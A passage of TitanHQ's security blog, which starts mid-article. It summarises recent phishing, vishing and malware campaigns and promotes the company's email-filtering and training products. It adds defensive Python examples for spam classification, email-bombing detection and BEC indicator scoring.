Also on July 4, 2024, a major event is taking place across the Atlantic in the UK. The UK general election will be taking place to decide the next government and scammers are already taking advantage and are using deepfake scams and malicious websites used to steal information and influence voters. It will be a similar story in the United States in the run-up to the November Presidential election.

With so many events taking place, it is vital for everyone to be on their guard and be constantly alert to the threat of scams, phishing, and malware attacks. Due to the elevated threat from phishing, businesses should step up their security awareness training to raise awareness of cyber threats and teach cybersecurity best practices. It is a good idea to use these events in your internal phishing simulations to identify any knowledge gaps and provide immediate training to any individual who fails a phishing simulation.

Security awareness training is made simple with SafeTitan from TitanHQ. SafeTitan is a comprehensive security awareness training platform that teaches security best practices to eradicate risky behaviors, raises awareness of the threat from phishing and malware, teaches the red flags to look for in emails and texts, and what to do if a potential threat is found. The phishing simulator can be used to automate internal phishing simulations to test awareness of threats and how employees are applying their training.

It is also a good time for businesses to bolster email security with an advanced email security solution. SpamTitan from TitanHQ is an advanced email security solution that uses predictive techniques to identify malicious emails, including AI and machine learning to block phishing threats and email sandboxing to block malware. SpamTitan integrates seamlessly with Microsoft 365 and is consistently rated as one of the best spam filters for Outlook, improving the native defenses that Microsoft offers. TitanHQ also offers a host of cybersecurity solutions for managed services providers, including advanced phishing protection, to help them better protect their clients.

If you want to improve protection this summer against increasingly sophisticated cyberattacks and scams, give the TitanHQ team a call to find out more about improving your security posture.

Malicious Email Campaign Delivers a Malware Cluster Bomb of Up to 10 Viruses

Many malware infections start with a malicious email that contains a file attachment with a malicious script that downloads malware if executed. One response to a single email is all it takes to infect the user’s device with malware, which may be able to spread across the network or at least provide the threat actor with the foothold they need in the network for follow-on activities. There is a much worse scenario, however. Rather than a single user infecting the network with one malware variant, that single response to the malicious email results in multiple malware infections. One campaign has been identified that does just that. A malware cluster bomb is delivered that can infect the user’s device with up to 10 different malware variants.

The campaign was identified by researchers at KrakenLabs and has been attributed to a threat actor known as Unfurling Hemlock. The campaign is being conducted globally with at least 10 countries known to have been attacked, although most of the victims have so far been located in the United States. The campaign has been running since at least February 2024 and uses two methods to deliver the malware variants – malicious emails and malware loaders installed by other threat groups. The threat actor has already distributed hundreds of thousands of malicious files in the 5 months since the operation is believed to have commenced.

In the email campaign conducted by Unfurling Hemlock, the victim is tricked into downloading a file called WExtract.exe which contains nested cabinet files, each containing a different malware variant. If the file is executed, the malware is extracted in sequence, and each malware variant is executed in reverse order, starting with the last malware variant to be extracted. Each malware cluster bomb has between four and seven stages, with some of those stages delivering multiple malware variants.

The malware variants delivered vary, but they consist of information stealers, backdoors, malware loaders, and botnets. Information stealers include Redline Stealer, Mystic Stealer, and RisePro, and malware loaders include Amadey and SmokeLoader. Other malware variants are used to disable security solutions such as Windows Defender, help with obfuscation and hiding of malware payloads, gather system information, and report on the status of the malware infections.

It is not clear how the threat actor is using these malware infections. They could be delivering malware for other threat actors and selling the access, using the malware to harvest credentials to sell on the darkweb, conducting their own attacks using whatever malware variant serves their purpose, or a combination of the three. What the attack does ensure is maximum flexibility, as there are high levels of redundancy to ensure that if some of the malware variants are detected, some are likely to remain.

The delivery of multiple malware variants means this campaign could be highly damaging, but it also increases the chance of detection. While antivirus software is a must and may detect some of the malware variants, others are likely to go undetected. The key to blocking attacks is to prevent the initial phishing emails from reaching end users and to provide training to the workforce to help with the identification and avoidance of these malicious emails.

Many email security solutions rely on antivirus engines to detect malware, but cybercriminals are skilled at bypassing these signature-based defenses. TitanHQ’s SpamTitan anti-spam software uses dual antivirus engines as part of the initial checks but also email sandboxing for behavioral analysis. Suspicious emails are sent to the sandbox, where files are unpacked and their behavior is analyzed in depth. The behavioral analysis identifies malicious actions, resulting in the messages being quarantined for further analysis by the security team. SpamTitan also includes AI and machine-learning algorithms to check how messages deviate from the emails typically received and can identify new threats that have not previously been seen. SpamTitan is a highly effective Microsoft 365 spam filter and can be provided as a gateway spam filter or a cloud-based anti-spam service.

End user training is an important extra layer of security that helps eradicate bad security practices and teaches employees how to recognize and avoid malicious emails. Should a malicious email bypass email security defenses, trained employees will be more likely to recognize the threat and report it to the security team. Training data from SafeTitan, TitanHQ’s security awareness training platform and phishing simulator, shows that training and phishing simulations can reduce susceptibility to email attacks by up to 80% when provided regularly throughout the year.

Give the TitanHQ sales team a call today for more information on these and other cybersecurity solutions to improve your defenses against the full range of cyber threats.

A Cost-Effective Way to Improve Office 365 Email Filtering

Around 40% of businesses use Office 365 for email, which includes Exchange Online Protection (EOP) with standard licenses for blocking spam and other email threats. While EOP will block a substantial amount of unwanted spam emails and malicious emails, the level of protection provided falls well below what many businesses need as too many threats pass through undetected.

Businesses can opt for a more expensive Business Premium license to improve Microsoft’s spam filter for Office 365, as this license includes Defender for Office 365. Alternatively, businesses can pay for Defender as an add-on. While Defender improves the phishing detection rate, this security feature only adds a little extra protection to EOP, and many malicious emails still go undetected. The E5 license provides the greatest amount of protection but it is prohibitively expensive for many businesses, and even this license does not give you cutting-edge protection.

Fortunately, there is a way to improve Office 365 email filtering that will provide you with excellent protection against phishing, malware, spam, and other email threats without having to cover the cost of expensive licenses and add-ons. That solution is to use a third-party email security solution that augments the spam filter for Office 365 regardless of the license you have. Many businesses prefer to use a third-party solution rather than placing all of their trust in Microsoft – a company that has recently struggled with preventing hackers from compromising its own systems.

SpamTitan from TitanHQ is a cloud-based email security solution that integrates seamlessly with Office 365 to greatly increase protection against email threats such as phishing, business email compromise, malware, and data theft by insiders, and is easy to set up, configure, and manage.

There are several features of SpamTitan that are lacking in Microsoft’s security solutions. In addition to performing reputation checks and blocking known malicious email addresses and domains, SpamTitan uses predictive techniques for detecting spam and phishing emails, such as Bayesian analysis, machine learning, and heuristics. These features allow SpamTitan to detect and block zero-day phishing threats and business email compromise, which Microsoft struggles to detect and block.
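To make the Bayesian analysis mentioned above concrete, here is an added example of a multinomial naive Bayes spam classifier. It is illustrative code written for this page, not SpamTitan’s implementation, and the training messages are constructed samples rather than real mail; a production filter would train on a much larger labelled corpus and combine this score with reputation and other checks.

```python
"""Naive Bayes spam classifier over a constructed toy corpus.

Added illustration of the Bayesian analysis described in the text; this is
not SpamTitan's code, and all training messages are constructed samples.
"""
import math
import re
from collections import Counter

TOKEN_RE = re.compile(r"[a-z0-9$']+")


def tokenize(text):
    """Lower-case word tokens; '$' is kept so '$1000' survives as a feature."""
    return TOKEN_RE.findall(text.lower())


class NaiveBayesSpamFilter:
    """Multinomial naive Bayes with Laplace (add-alpha) smoothing."""

    def __init__(self, alpha=1.0):
        self.alpha = alpha
        self.word_counts = {"spam": Counter(), "ham": Counter()}
        self.doc_counts = {"spam": 0, "ham": 0}
        self.vocab = set()

    def train(self, text, label):
        tokens = tokenize(text)
        self.word_counts[label].update(tokens)
        self.doc_counts[label] += 1
        self.vocab.update(tokens)

    def _log_likelihood(self, tokens, label):
        # log P(label) + sum over tokens of log P(token | label), smoothed so
        # that a word never seen in one class does not zero out the product.
        total_docs = sum(self.doc_counts.values())
        logp = math.log(self.doc_counts[label] / total_docs)
        total_words = sum(self.word_counts[label].values())
        denom = total_words + self.alpha * len(self.vocab)
        for tok in tokens:
            logp += math.log((self.word_counts[label][tok] + self.alpha) / denom)
        return logp

    def spam_probability(self, text):
        tokens = tokenize(text)
        log_spam = self._log_likelihood(tokens, "spam")
        log_ham = self._log_likelihood(tokens, "ham")
        # P(spam | text) = 1 / (1 + exp(log_ham - log_spam)), computed in log
        # space so long messages do not underflow; clamp to avoid overflow.
        diff = log_ham - log_spam
        if diff > 700:
            return 0.0
        return 1.0 / (1.0 + math.exp(diff))

    def classify(self, text, threshold=0.5):
        return "spam" if self.spam_probability(text) >= threshold else "ham"


# Constructed training corpus (not real mail).
SPAM_SAMPLES = [
    "urgent verify your account password now or your account will be suspended",
    "you have won a $1000 gift card click here to claim your prize",
    "your mailbox is full click the link to upgrade your storage immediately",
    "final notice invoice payment overdue click here to pay now",
    "confirm your password to keep your email account active",
]
HAM_SAMPLES = [
    "attached are the meeting notes from yesterday's project review",
    "can we move the budget call to thursday afternoon",
    "thanks for the update i will review the draft and send comments",
    "the quarterly report is ready please see the attached spreadsheet",
    "reminder the team lunch is at noon on friday",
]


def build_demo_filter():
    """Train the classifier on the constructed corpus."""
    clf = NaiveBayesSpamFilter()
    for s in SPAM_SAMPLES:
        clf.train(s, "spam")
    for h in HAM_SAMPLES:
        clf.train(h, "ham")
    return clf


if __name__ == "__main__":
    clf = build_demo_filter()
    for msg in ("Urgent: verify your password now or your account will be suspended",
                "Please review the attached notes from the project meeting"):
        print(f"{clf.spam_probability(msg):.4f}  {clf.classify(msg)}  {msg}")
```

The classification threshold is a policy choice: lowering it catches more phishing at the cost of more false positives, which is why such scores are usually one input to a layered verdict rather than the whole decision.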

SpamTitan performs extensive checks of embedded hyperlinks to combat phishing, including checks of shortened URLs. Office 365 malware detection is greatly improved with dual antivirus engines for detecting known malware and email sandboxing. The sandboxing feature includes machine learning and behavioral analysis for the safe detonation of files in an isolated environment, and message sandboxing is vital for detecting and blocking the zero-day malware threats that EOP and Defender miss.

SpamTitan cloud-based email filtering is also an ideal choice for Managed Services Providers looking to provide their customers with more advanced email security, especially for small- and medium-sized clients unwilling to pay for E5 licenses. SpamTitan has been developed from the ground up to meet the needs of MSPs and manage email security with minimal management overhead.

TitanHQ can also provide MSPs with additional protection against phishing with TitanHQ’s new anti-phishing solution, PhishTitan. PhishTitan uses a large language model (LLM) and AI to analyze emails to identify phishing attempts. The solution incorporates multiple curated feeds to detect malicious URLs linked in phishing emails, adds banners to emails from external sources to warn end users about potential threats, and adds post-delivery remediation across multiple tenants, allowing phishing emails to be instantly removed from the email system with a single click.

The best way to find out more about the full capabilities of SpamTitan and PhishTitan and how they work is to call the TitanHQ team. A product demonstration can be arranged and you can take advantage of a free trial to see for yourself the difference these solutions make and how they can significantly improve threat detection with Office 365.

New Campaigns Use Trojanized Software Downloaders to Distribute Dangerous Information Stealers

Two new malware distribution campaigns have been detected that deliver dangerous information-stealing malware, both targeting individuals looking to download free and pirated software.

Trojanized Cisco Webex Meetings App Delivers Malware Loader and Information Stealer

A malware distribution campaign has been identified that is using trojanized installers for free and pirated software to deploy a malware loader called HijackLoader, which in turn delivers an information stealer. In the attacks, the victim was tricked into downloading a trojanized version of the Cisco Webex Meetings App, a video streaming app. The user downloaded a password-protected archive (RAR) file, which contained a file called setup.exe. When the victim executed the file, DLL sideloading was used to launch HijackLoader, which was injected into a Windows binary.

HijackLoader connects with its command-and-control server and downloads another binary, an information stealer called Vidar Stealer. The malware bypasses User Account Control (UAC), escalates privileges, and adds an exception to the Windows Defender exclusion list. Vidar Stealer is used to steal credentials from browsers and deliver additional malware payloads, including a cryptocurrency miner. This campaign primarily targets organizations in Latin America and the Asia Pacific region.

Google Ads Used to Target Mac Users and Deliver Poseidon Malware

An information stealer called Poseidon is being distributed via malicious Google Ads that claim to provide the popular Arc web browser. The campaign targets Mac users and delivers a trojanized version of the Arc browser installer. If the installer is launched, the user gets the browser but is also infected with the malware.

According to an analysis from Malwarebytes, the new information stealer has similar features to the notorious Atomic Stealer, including a file grabber, crypto wallet extractor, and the ability to steal passwords from password managers such as Bitwarden and KeepassXC, passwords stored in browsers, and browser histories. The targeting of password managers makes this malware particularly dangerous, potentially allowing the theft of all passwords. The researchers believe the malware has been set up as a rival to Atomic Stealer.

How to Protect Your Business

Protecting against malware requires a defense-in-depth approach to security, where several different security solutions provide multiple overlapping layers of protection. These security measures should include the following:

Antivirus software – Antivirus software is a must. The software will be able to detect malware when it is downloaded onto a device or is executed. The malware is identified by its signature, which means that a particular malware variant must be known and its signature must be present in the malware definition list used by that software. Antivirus software will not detect novel malware variants without behavioral analysis of files.

Web filter – One of the best defenses against malware distributed via the internet is a web filter. The web filter blocks downloads of malicious files by preventing downloads of executable files from the Internet, blocking access to known malicious websites, and limiting the sites that users can visit on their corporate-owned devices. The main advantage of a web filter is the threat is dealt with before any files are downloaded from the Internet.

Security awareness training – Users should be warned about the risks of downloading software from the Internet, be taught how to identify the signs of phishing and malicious emails, and be trained on security best practices. The latter should include carefully checking the domain of the website offering software and making sure it is the official website of the software vendor or a reputable software distributor.

Email security solution – Malware is often delivered via email, usually via a malicious script in an attached file or via a linked web page. An email security solution needs to have antivirus capabilities – signature-based detection and behavioral analysis in an email sandbox. The former will detect known malware variants and email sandboxing is used to detect novel malware variants. Your email security solutions should also include AI-based detection, which can identify malicious messages based on how they differ from standard messages received by your business and perform comparisons with previous malware distribution campaigns.

While TitanHQ does not provide antivirus software, TitanHQ can help with web filtering (WebTitan), email security (SpamTitan), phishing protection (PhishTitan), and security awareness training (SafeTitan). For more information on improving your defenses against malware and TitanHQ’s multi-award-winning cloud-based email security and internet security solutions for businesses and managed service providers, give the TitanHQ team a call today.

More Than 50 Employee Email Accounts Compromised in Healthcare Phishing Attack

A phishing campaign targeting the Los Angeles Department of Public Health saw more than 50 employee email accounts compromised and the sensitive information of more than 200,000 individuals was exposed.

In this campaign, the threat actor impersonated a trustworthy sender and emailed a link that directed employees to a malicious website where email credentials were harvested. The website had been crafted to appear legitimate and requested they log in. When their credentials were entered, they were captured and used to access the employees’ email accounts. 53 employees fell for the scam. Their email accounts contained highly sensitive information that could be used for identity theft and fraud, including names, dates of birth, and Social Security numbers, as well as financial information and health insurance information. This campaign clearly demonstrates the damage that can be caused by phishing, and how a well-crafted campaign can fool many employees and result in a costly data breach.

While this phishing attack stands out due to the number of email accounts compromised, successful phishing attacks are common in healthcare. Healthcare employees are targeted via email, SMS, and other communication platforms, including over the phone. The Federal Bureau of Investigation and the Department of Health and Human Services recently issued a joint cybersecurity advisory about a campaign targeting IT helpdesk workers at healthcare organizations. Cybercriminals call IT helpdesks and impersonate employees to request password resets and enroll new devices to receive multifactor authentication codes. In this campaign, the attackers seek email credentials and then pivot to systems used for automated clearinghouse (ACH) payments to divert payments to their own accounts.

The Los Angeles Department of Public Health phishing attack serves as a reminder of the importance of conducting regular security awareness training. Employees need to be trained how to recognize phishing attempts. Through regular training, employees can be made aware of the red flags they need to look for in all communications and will be conditioned to be always on the lookout for threats and to report any potential threats to their security team. Healthcare employees who receive regular security awareness are less likely to be tricked by phishing scams. Training data from TitanHQ shows that organizations that conduct regular security awareness training with the SafeTitan security awareness training platform and phishing simulations using TitanHQ’s phishing simulator can reduce susceptibility to phishing scams by up to 80%.

The SafeTitan platform allows healthcare organizations to easily create and automate security awareness training programs and to tailor the training courses to different departments and users, ensuring that the training is relevant and focuses on the cyber threats that each user group is likely to encounter. The platform is modular, with each module taking no longer than 10 minutes to complete, making it easy for busy healthcare workers to fit the training into their workflows. The training content is engaging, fun, and enjoyable, and covers all threats and teaches cybersecurity best practices.

Phishing simulations can be easily conducted to test the effectiveness of training and identify employees who have not taken the training on board, allowing them to be provided with further training. The SafeTitan platform is the only security awareness training platform that delivers training in real-time in response to security mistakes, ensuring additional training is provided instantly at the moment when it is likely to have the greatest impact on changing behavior.

In addition to training, healthcare organizations must implement technical safeguards for HIPAA Security Rule compliance. TitanHQ offers a range of cloud-based security solutions for healthcare organizations to manage risks and achieve Security Rule compliance. These include SpamTitan anti-spam software which incorporates AI and machine learning algorithms to predict phishing attempts and dual antivirus engines and email sandboxing to combat malware. The WebTitan web filter protects against internet-based threats and can be used to block access to malicious and risky websites and block executable file downloads from the Internet to combat malware. Healthcare organizations that use Microsoft 365 can improve phishing protection with PhishTitan – a next-generation AI-based anti-phishing solution that offers unmatched protection against phishing and allows rapid remediation of phishing threats, preventing phishing attempts from compromising multiple email accounts.

All TitanHQ solutions are quick and easy to implement and use and can help healthcare organizations achieve and maintain HIPAA compliance, block more threats, and avoid costly data breaches. Contact TitanHQ today for more information about improving your security posture.

Quick Assist Abused in Tech Support Scam Leading to Black Basta Ransomware Attack

Earlier this month, warnings were issued about the Black Basta ransomware group, after an increase in activity in recent weeks. Now a new tactic has emerged to gain initial access to networks that ultimately leads to a Black Basta ransomware attack.

Storm-1811 is a highly sophisticated financially motivated cybercriminal group that was first detected in April 2022. Unlike many cybercriminal groups that start slowly, Storm-1811 conducted more than 100 attacks in its first 7 months. The latest campaign linked to the group is a type of tech support scam and is conducted over the phone through voice phishing (vishing).

The threat actor targets users and uses social engineering techniques over the phone to convince the user that they need to take urgent action to fix a fictitious problem on their computer. The threat actor often impersonates a member of the IT help desk or even Microsoft technical support. This attack leverages Quick Assist – a legitimate Windows app that is used to establish a remote connection to a device.

Quick Assist is a useful tool for providing IT support. If a friend or family member is having difficulty with their computer, they can provide remote access to a more technically skilled family member to sort out the problem remotely. Through Quick Assist, it is possible to view the display, make annotations, and take full control of the connected device.

Any remote access tool can be abused by a threat actor and Quick Assist is no different. If the user is convinced that the request is genuine and access to their device is granted, the threat actor will be able to perform a range of malicious actions. In this campaign, the threat actor installs a range of malicious tools to allow them to achieve their objectives, including remote monitoring and management (RMM) tools such as ScreenConnect and NetSupport Manager, and malware including Qakbot and Cobalt Strike. After gaining access, Storm-1811 actors can steal data and the access will ultimately lead to a Black Basta ransomware attack.

One point where this campaign could fail is convincing a user that they have a problem with their computer that requires remote access to fix. To get around this problem, Storm-1811 threat actors create a problem that needs to be addressed. One of the ways they do this is by conducting an email-bombing campaign. They identify email addresses of employees at the targeted company and bombard them with spam emails by signing them up to various high-volume email subscription services. When they make the call, the user will no doubt be frustrated by the spam emails, and it is easy to convince them that the problem can be sorted via Quick Assist.

The user just needs to press CTRL plus the Windows Key and Q to initiate Quick Assist, and then enter the security code provided by the threat actor and confirm that they want to proceed with screen sharing. The threat actor can then request remote access through the session and, if granted by the user, will be provided with full control of the user’s device. If they get to that point while the user is still on the phone, the threat actor will be able to explain any installation of a program as part of the remediation efforts. The threat actor can then unsubscribe the user from the various email subscriptions to make them believe that the problem has been resolved. Since the tools used by the threat actor can easily blend in, the attack is likely to go undetected until ransomware is used to encrypt files.

There are two easy ways to reduce susceptibility to this attack. The first is for IT teams to block or uninstall Quick Assist if they are not using the tool for remote access. Since other remote access tools may be used in these tech support scams, it is also vital to educate the workforce about tech support scams.
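The email-bombing step described above gives defenders an early signal: a mailbox suddenly receiving dozens of subscription confirmations from many unrelated senders is unusual and can be alerted on before the follow-up phone call. The following is an added detection example written for this page, not a TitanHQ feature. It assumes a simplified gateway log of one line per delivered message (timestamp, recipient, sender domain); both the format and the log lines are constructed, so the parser would need adapting to a real gateway’s log format.

```python
"""Detect a sudden flood of inbound mail to one mailbox (email bombing).

Added example for this page, not TitanHQ code. The log format and the
log lines are constructed; adapt parse_log() to your gateway's real format.
"""
from collections import defaultdict
from datetime import datetime, timedelta


def parse_log(lines):
    """Parse constructed lines of the form '<ISO timestamp> <recipient> <sender-domain>'."""
    events = []
    for line in lines:
        ts, rcpt, sender_domain = line.split()
        events.append((datetime.fromisoformat(ts), rcpt, sender_domain))
    return events


def detect_mail_bombing(events, window_minutes=10, threshold=30, min_distinct_senders=15):
    """Return {recipient: peak_count} for mailboxes that received at least
    `threshold` messages from at least `min_distinct_senders` different
    sender domains inside any sliding window of `window_minutes`.

    Requiring many distinct sender domains separates a bulk-subscription
    flood from one noisy legitimate sender (thresholds are assumptions).
    """
    by_recipient = defaultdict(list)
    for ts, rcpt, domain in events:
        by_recipient[rcpt].append((ts, domain))

    window = timedelta(minutes=window_minutes)
    alerts = {}
    for rcpt, evs in by_recipient.items():
        evs.sort()
        start = 0
        for end in range(len(evs)):
            # Slide the window start forward until it spans <= window_minutes.
            while evs[end][0] - evs[start][0] > window:
                start += 1
            in_window = evs[start:end + 1]
            distinct = {d for _, d in in_window}
            if len(in_window) >= threshold and len(distinct) >= min_distinct_senders:
                alerts[rcpt] = max(alerts.get(rcpt, 0), len(in_window))
    return alerts


def build_sample_events():
    """Constructed traffic: a flood to alice, normal volume to bob."""
    base = datetime(2024, 5, 14, 9, 0, 0)
    lines = []
    # 48 messages to alice within 8 minutes, each from a different list domain.
    for i in range(48):
        ts = base + timedelta(seconds=10 * i)
        lines.append(f"{ts.isoformat()} alice@example.com list{i:02d}.example")
    # Bob: 6 messages spread over an hour from 3 partner domains.
    for i in range(6):
        ts = base + timedelta(minutes=10 * i)
        lines.append(f"{ts.isoformat()} bob@example.com partner{i % 3}.example")
    return parse_log(lines)


if __name__ == "__main__":
    for mailbox, count in detect_mail_bombing(build_sample_events()).items():
        print(f"ALERT: {mailbox} received {count} messages from many senders in a short window")
```

An alert of this kind is a prompt for the help desk to expect, and refuse, unsolicited “support” calls to that user, and for the security team to check the endpoint for remote-access sessions.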

Users should be trained never to provide remote access to their device unless they initiate the interaction with their IT help desk or Microsoft support. Many companies provide security awareness training to the workforce that focuses on email phishing since this has long been the most common method of gaining access to internal networks.

Security awareness training should also educate users about other forms of phishing, including SMS phishing (smishing), vishing, and phishing via instant messaging services. With SafeTitan, creating, automating, and updating training content with the latest tactics used by cybercriminals is easy. The platform includes an extensive range of engaging training modules and is constantly updated with new content based on real-world attacks by cybercriminal groups.

When you train your workforce with SafeTitan, you can greatly reduce susceptibility to the different types of cyberattacks. Give the TitanHQ team a call today for further information or use the SafeTitan link to sign up for a free trial.

Phishing Is the Most Common Type of Cyberattack in the UK but BEC is the Costliest

Last month, the UK government published the findings of its 2024 cyber security breaches survey. The annual survey was conducted by the Department for Science, Innovation and Technology (DSIT) in partnership with the Home Office between September 2023 and January 2024 on 2,000 UK businesses, 1,004 registered UK charities, and 430 educational institutions. The survey provides insights into the nature of cyberattacks and data breaches experienced in the UK and confirms that attacks are increasing.

In the past year, 50% of surveyed businesses and almost one-third of charities (32%) experienced at least one cybersecurity breach or attack, with medium-sized businesses (70%), large businesses (74%), and high-income charities with £500,000+ annual income (66%) more likely to experience a cybersecurity breach.

It is often reported that cyberattacks are becoming more sophisticated; however, the most common cyber threats are relatively unsophisticated and are often effective. The most common type of cyberattack was phishing, which was reported by 84% of businesses and 83% of charities, with impersonation of organizations – online and via email – reported by more than one-third of businesses (35%) and charities (37%). Malware was used in 17% of attacks on businesses and 14% of attacks on charities. In terms of prevalence, phishing was by far the most common type of cybercrime. 90% of businesses and 94% of charities that were victims of cybercrime experienced at least one phishing attack.

The costliest type of phishing attack is business email compromise (BEC). BEC covers several types of attacks, with the most common involving criminals accessing work email accounts and using them to trick others into transferring funds or sending sensitive data. For example, a threat actor gains access to an email account of a vendor and uses the account to send an email to a customer containing a fake invoice or a request to change bank account information for an upcoming payment.

The losses to BEC attacks can be considerable. Attacks frequently result in fraudulent transfers of tens of thousands of pounds or in some cases hundreds of thousands or millions. With such large sums involved, criminals put considerable effort into these scams. Targets are researched, phishing is used to compromise an employee email account, internal phishing is used to gain access to the right accounts, the contents of accounts are studied to identify information that can be used in the scam, and the legitimate account holder is impersonated in the attack on the targeted organization or individual.

The goal in these attacks is often to gain access to the email account of the CEO or a senior executive, and that account is used to conduct a scam internally or externally. Since the request comes from a trusted authority figure and uses their legitimate account, the request is often not questioned.

BEC attacks can be difficult to identify by employees but also by email security solutions as trusted accounts are used for the scams and the emails usually do not contain any malicious content such as a URL to a phishing website or malware. These attacks use social engineering and target human weaknesses.
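Because BEC emails usually carry no malicious link or attachment, what can be checked is the envelope and the request itself. The following is an added example for this page, not TitanHQ code, of three common BEC indicators scored over inbound messages: an executive’s display name on an external sender address, a Reply-To that steers replies to a different domain, and payment-change language in the text. The internal domain, the executive directory, the keyword list and the sample messages are all constructed. A message sent from a genuinely compromised vendor account would only trip the third check, which is why the text pairs technical controls with staff training.

```python
"""Score inbound messages for common BEC indicators.

Added example for this page, not TitanHQ code. INTERNAL_DOMAIN, EXECUTIVES,
the keyword pattern and SAMPLES are constructed for the demo.
"""
import re
from email.utils import parseaddr

INTERNAL_DOMAIN = "example.com"                      # assumed organisation domain
EXECUTIVES = {"jane doe": "jane.doe@example.com"}    # constructed directory

# Constructed keyword set; a real deployment would tune this to its own traffic.
PAYMENT_RE = re.compile(
    r"\b(wire transfer|bank (?:account|details)|new account number|"
    r"updated (?:banking|payment) (?:details|information)|urgent payment)\b",
    re.I,
)


def _domain(addr):
    return addr.rsplit("@", 1)[-1].lower() if "@" in addr else ""


def bec_indicators(msg):
    """msg: dict with 'from', optional 'reply_to', 'subject', 'body'.
    Returns the list of indicator names that fired, in a fixed order."""
    display, addr = parseaddr(msg.get("from", ""))
    from_domain = _domain(addr)
    fired = []

    # 1. Display name of a known executive on an address outside the company.
    if display.strip().lower() in EXECUTIVES and from_domain != INTERNAL_DOMAIN:
        fired.append("exec_display_name_external_sender")

    # 2. Reply-To pointing at a different domain than the visible sender.
    _, reply_addr = parseaddr(msg.get("reply_to", ""))
    if reply_addr and _domain(reply_addr) != from_domain:
        fired.append("reply_to_domain_mismatch")

    # 3. Language typical of payment-diversion requests.
    text = msg.get("subject", "") + "\n" + msg.get("body", "")
    if PAYMENT_RE.search(text):
        fired.append("payment_change_language")

    return fired


# Constructed sample messages (not real mail; .example TLDs are reserved).
SAMPLES = [
    {
        "from": "Jane Doe <jane.doe@webmail-free.example>",
        "subject": "Quick favour",
        "body": "Are you at your desk? I need an urgent payment sent before the board meeting.",
    },
    {
        "from": "Accounts <ap@vendor.example>",
        "reply_to": "ap@vendor-example.co",
        "subject": "Invoice 4471",
        "body": "Please note our updated banking details for the attached invoice.",
    },
    {
        "from": "Bob Smith <bob.smith@example.com>",
        "subject": "Lunch",
        "body": "Team lunch on Friday at noon?",
    },
]

if __name__ == "__main__":
    for sample in SAMPLES:
        print(sample["subject"], "->", bec_indicators(sample) or "no indicators")
```

Any message that fires the first or second indicator together with the third is a reasonable candidate for quarantine or a warning banner; the third on its own is better handled by an out-of-band verification procedure for payment changes.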

Defending against BEC and phishing attacks requires a combination of measures. Since targets are extensively researched, businesses should consider reducing their digital footprint and making it harder for cybercriminals to obtain information that can be used in convincing phishing and BEC campaigns, especially by reducing the amount of information that is available online about senior staff members.

Anti-spam software is a must for blocking the initial phishing attacks that are used to compromise accounts; however, an advanced solution is required to block sophisticated BEC attacks. TitanHQ’s cloud-based anti-spam service – SpamTitan – performs a barrage of spam checks for inbound and outbound emails to identify spam, phishing, and BEC content, including reputation checks of domains and accounts, scans of message content, sandboxing to identify malicious attachments, and AI and machine learning analysis to identify emails that deviate from the standard messages typically received by an organization.

PhishTitan is an anti-phishing solution for Microsoft 365 that enhances Microsoft’s anti-phishing measures and catches the phishing threats that Microsoft misses. The solution adds banners to emails to warn employees about potentially malicious content and allows security teams to quickly remediate phishing attempts across the entire email environment.

Since phishing and BEC attacks target human weaknesses, it is vital to provide training to the workforce. The aim should be to improve awareness and condition employees to always be on the lookout for a scam and to err on the side of caution and report suspicious emails to their IT security team. Phishing simulations are useful for helping staff to recognize phishing emails and identify knowledge gaps. TitanHQ’s SafeTitan training platform has all the content you need to run effective training programs to improve defenses against phishing and BEC attacks.

Contact TitanHQ today about these solutions and other ways you can improve your defenses against phishing, BEC, and other types of cyberattacks.

Discord Phishing Risk Increases with 50,000+ Malicious Links Detected in 6 Months

Phishing tactics are constantly changing and while email is still one of the most common ways of getting malicious content in front of end users, other forms of phishing are growing. Smishing (SMS phishing) has increased considerably in recent years, and vishing (voice phishing) is also common, especially for IT support scams.

Another method of malware delivery that has seen an enormous increase recently is the use of the instant messaging and VoIP social platform Discord. Discord has long been popular with gamers because a server with voice and text channels can be created at no extra cost, both of which are needed for in-game voice chat. While gamers still account for a majority of users, usage for non-gaming purposes is growing.

The platform is also proving popular with cybercriminals who are using it for phishing campaigns and malware distribution. According to Bitdefender, the antivirus company whose technology powers the SpamTitan email sandboxing feature, more than 50,000 malicious links have been detected on Discord in the past 6 months. Around a year ago, a campaign was detected that used Discord to send links to a malicious site resulting in the delivery of PureCrypter malware – a fully featured malware loader that is used for distributing information stealers and remote access trojans.

Discord responded to the misuse of the platform and implemented changes such as adding a 24-hour expiry for links to internally hosted files, which made it harder for malicious actors to use the platform for hosting malware. While this move has hampered cybercriminals, the platform is still being used for malware distribution. One of the latest malicious Discord campaigns is concerned with obtaining credentials and financial information rather than distributing malware.

The campaign involves sending links that offer users a free Discord Nitro subscription. Discord Nitro provides users with perks that are locked for other users, such as being able to use custom emojis anywhere, set custom video backgrounds, HD video streaming, bigger file uploads, and more. Discord Nitro costs $9.99 a month, so a free account is attractive.

If the user clicks the link in the message, they are directed to a fake Discord website where they are tricked into disclosing credentials and financial information. Other Discord Nitro lures have also been detected along the same theme, offering advice on how to qualify for a free Discord Nitro subscription by linking to other accounts such as Steam. According to Bitdefender, 28% of detected malicious uses are spam threats, 27% are untrusted, around 20% are phishing attempts and a similar percentage involve malware distribution.

Any platform that allows direct communication with users can be used for phishing and other malicious purposes. Security awareness training should cover all of these attack vectors and should get the message across to end users that they always need to be on their guard whether they are on email, SMS, instant messaging services, or the phone. By running training courses continuously throughout the year, businesses can develop a security culture by training their employees to be constantly on the lookout for phishing and malware threats and developing the skills that allow them to identify threats.

Developing, automating, and updating training courses to include information on the latest threats, tactics, techniques, and procedures used by threat actors is easy with the SafeTitan security awareness training platform. SafeTitan makes training fun and engaging for end users and the platform has been shown to reduce susceptibility to phishing and malware threats by up to 80%.

If you are not currently running a comprehensive security awareness training program for your workforce, or if you are looking to improve your training, give the TitanHQ team a call and ask about SafeTitan. SafeTitan is one product in a suite of cloud-based security solutions for businesses and managed service providers, which includes an enterprise spam filter, a malicious file sandbox for email, a DNS-based web filter, email encryption, email archiving, and phishing protection for M365.

How to Protect Against Advanced Email and SMS Phishing Threats

Email phishing is the most common form of phishing, with email providing threat actors with an easy way of getting their malicious messages in front of employees. Phishing emails typically include a URL along with a pressing reason for clicking the link. The URLs are often masked to make them appear legitimate, either with a button or link text relevant to the lure in the message. Email attachments are often added to emails that contain malicious scripts for downloading a variety of malicious payloads, or links to websites where malware is hosted.
